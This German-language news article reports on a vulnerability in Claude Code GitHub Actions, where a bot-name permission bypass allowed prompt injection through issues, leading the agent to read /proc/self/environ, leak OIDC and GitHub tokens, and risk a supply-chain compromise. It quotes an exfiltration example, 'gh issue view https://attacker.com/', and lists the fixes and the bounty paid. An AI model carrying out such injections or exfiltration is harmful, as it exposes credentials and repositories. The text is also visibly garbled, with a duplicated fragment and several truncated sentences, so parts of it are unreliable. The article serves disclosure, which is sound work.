Sicherheitslücke in Claude Code GitHub Actions ermöglicht Angreifern Zugriff auf beliebige Repositories

Claude Code GitHub Actions beschränkt die Workflow-Ausführung auf Benutzer mit Schreib- oder Admin-Zugriff. Die Funktion checkWritePermissions vertraute jedoch bedingungslos jedem Akteur, dessen Name mit [bot] endet, unabhängig ächlichen Berechtigungen.

Da GitHub-Apps impliziten Lesezugriff auf öffentliche Repositories haben und mithilfe eines Installations-Tokens auf jedem öffentlichen Repository Issues oder Pull Requests erstellen können, könnte ein Angreifer diese Kontrolle vollständig umgehen.

Die Schwachstelle in den GitHub Actions erforderte lediglich drei Schritte: Erstellung einer bösartigen GitHub-App, Installation derselben auf einem beliebigen (keine besonderen Berechtigungen erforderlich) und Nutzung des Installations-Tokens, um im Ziel-Repository ein Issue oder einen Pull Request zu eröffnen.

Da der Akteur als GitHub-App-Bot erschien,

Da der Akteur als GitHub-App-Bot erschien, ergab die Berechtigungsprüfung den Wert „true", und der Workflow verarbeitete den. Während der Tag-Modus eine zusätzliche Prüfung für menschliche Akteure (HumanActor check) vorsah, fehlte dieser Schutzmechanismus im Agenten-Modus zum Zeitpunkt der Entdeckung.

Sobald der Umgehungsweg erfolgreich war, konnte der Angreifer eine bösartige Issue-Beschreibung mit einer gefälschten Fehlermeldung erstellen, um Claude Code dazu zu verleiten, eingebettete Befehle auszuführen – ein klassischer Prompt-Injection-Angriff.

Claude Code erlaubt bestimmte Bash-Befehle (wie cat und head) ohne explizite Benutzerfreigabe, wodurch ein Angreifer den Linux-Pseudodatei /proc/self/environ auslesen kann. Dieser Pseudodatei werden alle an den Workflow-Prozess übergebenen Umgebungsvariablen ausgesetzt.

Technischer Hintergrund

Unter diesen Umgebungsvariablen sind die sensibelsten ACTIONS_ID_TOKEN_REQUEST_TOKEN und ACTIONS_ID_TOKEN_REQUEST_URL – die Credentials, die verwendet werden, um einen OpenID Connect (OIDC)-Token Code GitHub Actions nutzt diesen OIDC-Token, um über https://api.anthropic.com/api/github/github-app-token-exchange ein privilegiertes Claude GitHub App Installationstoken vom Backend diesen exfiltrierten Credentials könnte ein Angreifer den gesamten Token-Austauschprozess nachahmen und ein GitHub App-Token mit Schreibzugriff auf Repository-Inhalte, Issues, Pull Requests und Workflows erhalten.

Das MCP-Tool `mcp__github__update_issue`, das im eigenen Issue-Triage-Workflow, wurde missbraucht, um gestohlene Geheimnisse zurück in ein öffentliches Issue zu schreiben, wo der Angreifer sie einfach lesen konnte.

Die schwerwiegendste Konsequenz war, dass das Repository `anthropics/claude-code-action` selbst einen anfälligen Agentenmodus-Workflow verwendete.

Sicherheitslage und Risiko

Ein erfolgreicher Angriff hätte es einem Angreifer ermöglicht, bösartigen Code direkt in die Quelldateien der Action einzufügen, der sich dann auf alle abhängigen Downstream-Repositories ausbreiten würde – ein klassischer Supply-Chain-Angriff. Insgesamt umfasste die vollständige Angriffs-Kette sieben Schritte: böswilligen GitHub App bis zum Push Repository.

Unabhängig davon identifizierte RyotaK eine Fehlkonfiguration in den offiziellen Beispiel-Workflows, die `allowed_non_write_users: "*"` verwendeten.

Bei Kombination mit Schreibzugriffsrechten und einem zweiten Workflow unter Verwendung: write könnte ein externer Angreifer die beiden Workflows verketten: Er nutzt den Triage-Workflow, um über die öffentlich sichtbare Workflow-Ausführungsübersicht GITHUB_TOKEN zu stehlen, bearbeitet anschließend ein bestehendes Issue, um Prompts in den tag-mode-Workflow einzuschleusen und führt so ohne jemals den GitHub-App-Bypass benötigen zu müssen zur vollständigen Kompromittierung des Repositories.

Technischer Hintergrund

Bemerkenswerterweise war sogar der CLI-Befehl gh issue view für die Extraktion; eine Prompt-Injection könnte Claude anweisen, Geheimnisse in URL-Pfadargumenten einzubetten (z. B. gh issue view https://attacker.com/), wodurch Credentials an einen externen Server gesendet werden.

Anthropic hat die Sicherheitslücken in Claude Code GitHub Actions v1.0.94 behoben.

Zu den Fixes gehören die Hinzufügung eines `checkHumanActor`-Aufrufs im Agent-Modus, die standardmäßige Deaktivierung des Workflow-Ausführungs-Zusammenfassungsabschnitts, das Entfernen Code gestarteten Kindprozessen sowie die Implementierung eines benutzerdefinierten `gh`-Befehls-Wrapper, der Argumente validiert und URL-Muster blockiert, die zur Datenexfiltration befähigt sind.

Sicherheitslage und Risiko

Anthropic hat zudem Logik hinzugefügt, um Probleme und Kommentare zu ignorieren, die nach dem Auslösen eines Workflows bearbeitet wurden, wodurch der Angriffsvektor der Workflow-Verkettung geschlossen wurde. Der Forscher bewertete die Schwachstellen mit einem CVSS v4.0-Score von 7.8.

Anthropic vergütete im Rahmen seines Bug-Bounty-Programms 3.800 US-Dollar plus einen Bonus von 1.000 US-Dollar.

Benutzer, die weiterhin Claude Code GitHub Actions ausführen, werden aufgefordert, alle Workflows zu überprüfen, die `allowed_non_write_users` verwenden, freigegebene Geheimnisse auf den Anthropic API-Schlüssel und `GITHUB_TOKEN` zu beschränken und Workflow-Ausführungsprotokolle auf Indikatoren für Kompromittierungen zu überprüfen.